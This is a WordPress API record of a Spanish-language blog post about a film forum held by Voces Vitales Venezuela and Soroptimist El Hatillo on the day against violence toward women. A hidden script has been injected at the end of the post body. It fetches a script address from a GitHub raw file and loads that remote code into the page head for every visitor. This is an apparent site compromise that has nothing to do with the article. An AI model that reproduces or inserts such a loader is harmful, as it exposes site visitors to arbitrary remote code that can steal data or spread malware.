{"id":3822,"date":"2023-11-25T17:25:03","date_gmt":"2023-11-25T21:55:03","guid":{"rendered":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3822"},"modified":"2024-07-25T05:15:10","modified_gmt":"2024-07-25T09:45:10","slug":"cine-foro-la-voz-de-la-igualdad-dirigida-por-mimi-leder","status":"publish","type":"post","link":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3822","title":{"rendered":"Cine Foro: \u00bb La Voz de la Igualdad\u00bb dirigida por Mimi Leder"},"content":{"rendered":"<p style=\"text-align: justify;\"><a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Cine-foro-1.jpg\"><img loading=\"lazy\" class=\"size-medium wp-image-3823 alignleft\" src=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Cine-foro-1-300x189.jpg\" alt=\"\" width=\"300\" height=\"189\" srcset=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Cine-foro-1-300x189.jpg 300w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Cine-foro-1-768x485.jpg 768w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Cine-foro-1.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>En el marco de la conmemoraci\u00f3n del <em><strong>D\u00eda Internacional para la Eliminaci\u00f3n de la Violencia contra las Mujeres<\/strong><\/em>, Voces Vitales Venezuela (VVV) llev\u00f3 a cabo un emocionante cine foro en colaboraci\u00f3n con la organizaci\u00f3n <strong>Soroptimist<\/strong> Internacional El Hatillo.<\/p>\n<p style=\"text-align: justify;\">El evento tuvo lugar el pasado 25 de noviembre en la sede de <strong>Soroptimist<\/strong> Internacional El Hatillo, donde se proyect\u00f3 la pel\u00edcula estadounidense <strong>\u00abLa Voz de la Igualdad\u00bb<\/strong>, dirigida por <strong>Mimi Leder<\/strong>. Esta pel\u00edcula, basada en una historia real, relata la valiente lucha de una mujer por conseguir la igualdad de g\u00e9nero en su trabajo y su sociedad.<\/p>\n<p style=\"text-align: justify;\">Durante la proyecci\u00f3n, <strong>Mar\u00eda Cristina Parra<\/strong> y <strong>Adela Vivas<\/strong>, directoras de <strong>Voces Vitales Venezuela<\/strong>, junto con <strong>Carmen Gonz\u00e1lez<\/strong> de <strong>Asosaber<\/strong>, presentaron el film y guiaron la posterior discusi\u00f3n que se gener\u00f3 entre los asistentes. El cine foro se convirti\u00f3 en un espacio de reflexi\u00f3n y debate en torno a la problem\u00e1tica de la <strong>violencia contra las mujeres<\/strong> y la importancia de la <strong>igualdad de g\u00e9nero<\/strong>.<\/p>\n<p style=\"text-align: justify;\">El evento cont\u00f3 con la participaci\u00f3n de las mujeres pertenecientes a la <strong>Red de Emprendedoras de El Hatillo<\/strong>, quienes compartieron sus experiencias y aportaron perspectivas valiosas durante la discusi\u00f3n. Asimismo, contamos con la presencia de nuestras aliadas de la <strong>Junta Directiva de Soroptimist<\/strong>, quienes han sido un apoyo fundamental en la lucha por la <strong>igualdad de oportunidades<\/strong> para todas las mujeres.<\/p>\n<p style=\"text-align: justify;\">En definitiva, el cine foro organizado por <strong>Voces Vitales Venezuela<\/strong> y <strong>265<\/strong> fue un encuentro memorable en el que se unieron voces, ideas y experiencias para promover un mundo libre de violencia y discriminaci\u00f3n hacia las mujeres. Nos motiv\u00f3 a seguir trabajando juntas para construir una sociedad justa e igualitaria donde todas las voces sean escuchadas y respetadas.<\/p>\n<p><script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En el marco de la conmemoraci\u00f3n del D\u00eda Internacional para la Eliminaci\u00f3n de la Violencia contra las Mujeres, Voces Vitales Venezuela (VVV) llev\u00f3 a cabo un emocionante cine foro en colaboraci\u00f3n con la organizaci\u00f3n Soroptimist Internacional El Hatillo. El evento&hellip; <a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3822\" class=\"more-link\">Continuar leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":3823,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[92,5,612],"tags":[],"_links":{"self":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3822"}],"collection":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3822"}],"version-history":[{"count":0,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3822\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/media\/3823"}],"wp:attachment":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3822"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3822"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3822"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}